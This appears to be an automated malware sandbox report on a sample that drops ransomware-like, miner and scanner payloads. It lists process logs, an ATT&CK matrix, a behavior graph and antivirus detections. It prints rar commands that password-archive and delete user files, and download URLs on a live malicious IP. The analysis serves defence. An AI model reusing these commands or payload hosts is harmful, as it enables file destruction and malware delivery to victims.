          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5AC9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,56_2_00007FF650B5AC9C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Documents and Settings VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\DW VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Cultures VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wekyb3d8bbwe\VFS\SystemX64 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Program Files (x86)\Common Files\Oracle\Java\javapath VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\ProgramData\Application Data VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\ProgramData\Desktop VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\ProgramData\Documents VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\ProgramData\Start Menu VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\ProgramData\Templates VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\All Users VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\AppData\Local\Application Data VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\AppData\Local\History VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\AppData\Local\Temporary Internet Files VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Application Data VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Cookies VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Local Settings VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\My Documents VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\NetHood VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\PrintHood VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Recent VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\SendTo VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Start Menu VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default\Templates VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Default User VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\Public\Documents\My Videos VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\History VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\WindowsApps\MicrosoftEdge.exe VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalCache VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalCache VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\AppData\Local\Temporary Internet Files VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\Application Data VolumeInformation
          Source: C:\Windows\Temp\encrypt.exeQueries volume information: C:\Users\user\Cookies VolumeInformation
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5AC20 cpuid 56_2_00007FF650B5AC20
          Source: C:\Windows\Temp\encrypt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5B9D8 GetSystemTime,SystemTimeToFileTime,56_2_00007FF650B5B9D8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B54470 GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,56_2_00007FF650B54470

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Windows Management Instrumentation          		1
          Windows Service          		1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		11
          Input Capture          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium13
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Data Encrypted for Impact
          Default Accounts11
          Scripting          		1
          Scheduled Task/Job          		1
          Windows Service          		11
          Scripting          		LSASS Memory3
          File and Directory Discovery          		Remote Desktop Protocol11
          Input Capture          		Exfiltration Over Bluetooth21
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
          System Shutdown/Reboot
          Domain Accounts112
          Command and Scripting Interpreter          		121
          Registry Run Keys / Startup Folder          		11
          Process Injection          		11
          Obfuscated Files or Information          		Security Account Manager27
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          Scheduled Task/Job          		Logon Script (Mac)1
          Scheduled Task/Job          		1
          Software Packing          		NTDS121
          Security Software Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer24
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Service Execution          		Network Logon Script121
          Registry Run Keys / Startup Folder          		11
          Masquerading          		LSA Secrets1
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable Media2
          PowerShell          		Rc.commonRc.common1
          Modify Registry          		Cached Domain Credentials21
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Virtualization/Sandbox Evasion          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 683425 Sample: jxatBamQnK Startdate: 13/08/2022 Architecture: WINDOWS Score: 100 123 Snort IDS alert for network traffic 2->123 125 Antivirus detection for URL or domain 2->125 127 Antivirus detection for dropped file 2->127 129 12 other signatures 2->129 10 jxatBamQnK.exe 2 7 2->10         started        15 cmd.exe 1 2->15         started        17 powershell.exe 19 2->17         started        19 5 other processes 2->19 process3 dnsIp4 121 212.87.212.218, 49760, 49761, 49762 GBTCLOUDUS Germany 10->121 109 C:\Windows\Temp\encrypt.exe, PE32+ 10->109 dropped 111 C:\Users\user\AppData\Roaming\...\start.bat, ASCII 10->111 dropped 113 C:\ProgramData\Microsoft\...\start.bat, ASCII 10->113 dropped 155 Drops script or batch files to the startup folder 10->155 157 Uses cmd line tools excessively to alter registry or file data 10->157 159 Uses schtasks.exe or at.exe to add and modify task schedules 10->159 21 encrypt.exe 10->21         started        25 cmd.exe 1 10->25         started        27 reg.exe 1 1 10->27         started        37 11 other processes 10->37 161 Suspicious powershell command line found 15->161 29 powershell.exe 14 22 15->29         started        31 conhost.exe 15->31         started        163 Powershell drops PE file 17->163 33 conhost.exe 17->33         started        35 Conhost.exe 19->35         started        file5 signatures6 process7 file8 103 C:\Windows\Temp\rar.exe, PE32+ 21->103 dropped 131 Antivirus detection for dropped file 21->131 133 Multi AV Scanner detection for dropped file 21->133 135 Machine Learning detection for dropped file 21->135 137 Modifies existing user documents (likely ransomware behavior) 21->137 39 cmd.exe 21->39         started        41 cmd.exe 21->41         started        55 8 other processes 21->55 139 Suspicious powershell command line found 25->139 43 fodhelper.exe 1 15 25->43         started        46 conhost.exe 25->46         started        141 Creates an autostart registry key pointing to binary in C:\Windows 27->141 48 conhost.exe 27->48         started        105 C:\Windows\Temp\daemon.exe, PE32+ 29->105 dropped 107 PowerShell_transcr....20220813090655.txt, UTF-8 29->107 dropped 50 daemon.exe 29->50         started        53 conhost.exe 31->53         started        57 13 other processes 37->57 signatures9 process10 file11 59 rar.exe 39->59         started        61 conhost.exe 39->61         started        63 rar.exe 41->63         started        65 conhost.exe 41->65         started        147 Uses cmd line tools excessively to alter registry or file data 43->147 67 reg.exe 1 43->67         started        99 C:\Windows\Temp\scan.exe, PE32+ 50->99 dropped 101 C:\Windows\Temp\miner.exe, PE32+ 50->101 dropped 149 Antivirus detection for dropped file 50->149 151 Multi AV Scanner detection for dropped file 50->151 153 Machine Learning detection for dropped file 50->153 69 scan.exe 50->69         started        73 findstr.exe 50->73         started        75 3 other processes 50->75 77 17 other processes 55->77 signatures12 process13 dnsIp14 79 Conhost.exe 59->79         started        95 2 other processes 63->95 81 conhost.exe 67->81         started        115 192.168.2.100 unknown unknown 69->115 117 192.168.2.101 unknown unknown 69->117 119 97 other IPs or domains 69->119 143 Antivirus detection for dropped file 69->143 145 Multi AV Scanner detection for dropped file 69->145 83 conhost.exe 73->83         started        85 Conhost.exe 73->85         started        87 conhost.exe 75->87         started        89 conhost.exe 75->89         started        91 conhost.exe 75->91         started        93 Conhost.exe 77->93         started        signatures15 process16 process17 97 Conhost.exe 79->97         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          jxatBamQnK.exe62%VirustotalBrowse
          jxatBamQnK.exe58%ReversingLabsWin64.Trojan.Generic
          jxatBamQnK.exe100%AviraHEUR/AGEN.1211808
          jxatBamQnK.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\Temp\scan.exe100%AviraTR/AD.PSLoader.xbdrr
          C:\Windows\Temp\miner.exe100%AviraHEUR/AGEN.1215032
          C:\Windows\Temp\encrypt.exe100%AviraTR/Redcap.anyaz
          C:\Windows\Temp\daemon.exe100%AviraHEUR/AGEN.1211808
          C:\Windows\Temp\miner.exe100%Joe Sandbox ML
          C:\Windows\Temp\encrypt.exe100%Joe Sandbox ML
          C:\Windows\Temp\daemon.exe100%Joe Sandbox ML
          C:\Windows\Temp\daemon.exe58%ReversingLabsWin64.Trojan.Generic
          C:\Windows\Temp\encrypt.exe21%MetadefenderBrowse
          C:\Windows\Temp\encrypt.exe50%ReversingLabsWin64.Infostealer.HashCity
          C:\Windows\Temp\miner.exe24%MetadefenderBrowse
          C:\Windows\Temp\miner.exe77%ReversingLabsWin64.Trojan.Miner
          C:\Windows\Temp\rar.exe0%MetadefenderBrowse
          C:\Windows\Temp\rar.exe0%ReversingLabs
          C:\Windows\Temp\scan.exe32%MetadefenderBrowse
          C:\Windows\Temp\scan.exe23%ReversingLabsWin64.Trojan.Wofith

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          35.0.daemon.exe.aa0000.1.unpack100%AviraHEUR/AGEN.1211808Download File
          47.0.daemon.exe.aa0000.0.unpack100%AviraHEUR/AGEN.1211808Download File
          50.0.daemon.exe.aa0000.0.unpack100%AviraHEUR/AGEN.1211808Download File
          39.0.daemon.exe.aa0000.0.unpack100%AviraHEUR/AGEN.1211808Download File
          35.0.daemon.exe.aa0000.2.unpack100%AviraHEUR/AGEN.1211808Download File
          0.0.jxatBamQnK.exe.12a0000.0.unpack100%AviraHEUR/AGEN.1211808Download File
          35.0.daemon.exe.aa0000.0.unpack100%AviraHEUR/AGEN.1211808Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://212.87.212.218/id:100%Avira URL Cloudmalware
          http://212.87.212.218/idna:100%Avira URL Cloudmalware
          http://ggg.cpdd:800%Avira URL Cloudsafe
          http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%B0%Avira URL Cloudsafe
          http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E0%Avira URL Cloudsafe
          http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-15480%Avira URL Cloudsafe
          http://212.87.212.218/doanlowd.txt100%Avira URL Cloudmalware
          http://print1n.top)0%Avira URL Cloudsafe
          https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%0%Avira URL Cloudsafe
          https://www.zhihuifly.com/t/topic/31180%Avira URL Cloudsafe
          https://www.hackbug.net/archives/111.html0%Avira URL Cloudsafe
          http://www.xdoa.cn0%Avira URL Cloudsafe
          http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%Avira URL Cloudsafe
          http://127.0.0.1:8080in0%Avira URL Cloudsafe
          https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9d0%Avira URL Cloudsafe
          http://cve-2018-7600-8-x.vulnet:8080/0%Avira URL Cloudsafe
          http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sonly0%Avira URL Cloudsafe
          http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%0%Avira URL Cloudsafe
          http://jellyfin.org0%Avira URL Cloudsafe
          http://%s.%sillegal0%Avira URL Cloudsafe
          https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/nam0%Avira URL Cloudsafe
          https://phyb0x.github.0%Avira URL Cloudsafe
          http://webkiller.cn/)0%Avira URL Cloudsafe
          http://127.0.0.1:8080sql:0%Avira URL Cloudsafe
          http://212.87.212.218/encrypt.exe100%Avira URL Cloudmalware
          http://212.87.212.218/daemon.exe100%Avira URL Cloudmalware
          https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/0%Avira URL Cloudsafe
          http://wx.weaver)(0%Avira URL Cloudsafe
          https://print1n.top)0%Avira URL Cloudsafe
          https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E60%Avira URL Cloudsafe
          https://hackfun.org/)0%Avira URL Cloudsafe
          https://shells.systems/pandorafms-v7-0ng-a0%Avira URL Cloudsafe
          http://212.87.212.218/scan.exe100%Avira URL Cloudmalware
          https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e39960%Avira URL Cloudsafe
          https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E0%Avira URL Cloudsafe
          http://212.87.212.218/miner.exe100%Avira URL Cloudmalware
          http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A80%Avira URL Cloudsafe
          http://127.0.0.1:id:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://212.87.212.218/doanlowd.txttrue
          • Avira URL Cloud: malware
          		unknown
          http://212.87.212.218/encrypt.exetrue
          • Avira URL Cloud: malware
          		unknown
          http://212.87.212.218/daemon.exetrue
          • Avira URL Cloud: malware
          		unknown
          http://212.87.212.218/scan.exetrue
          • Avira URL Cloud: malware
          		unknown
          http://212.87.212.218/miner.exetrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://medium.com/scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
            		high
            https://github.com/chaosec2021scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
              		high
              https://github.com/dreadlocked/Drupalgeddon2scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                		high
                https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                  		high
                  http://212.87.212.218/id:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://212.87.212.218/idna:daemon.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://ggg.cpdd:80scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%Bscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://about.gitlab.com/)scan.exefalse
                    		high
                    http://www.tongda2000.comscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                      		high
                      http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8Escan.exefalse
                      • Avira URL Cloud: safe
                      		unknown
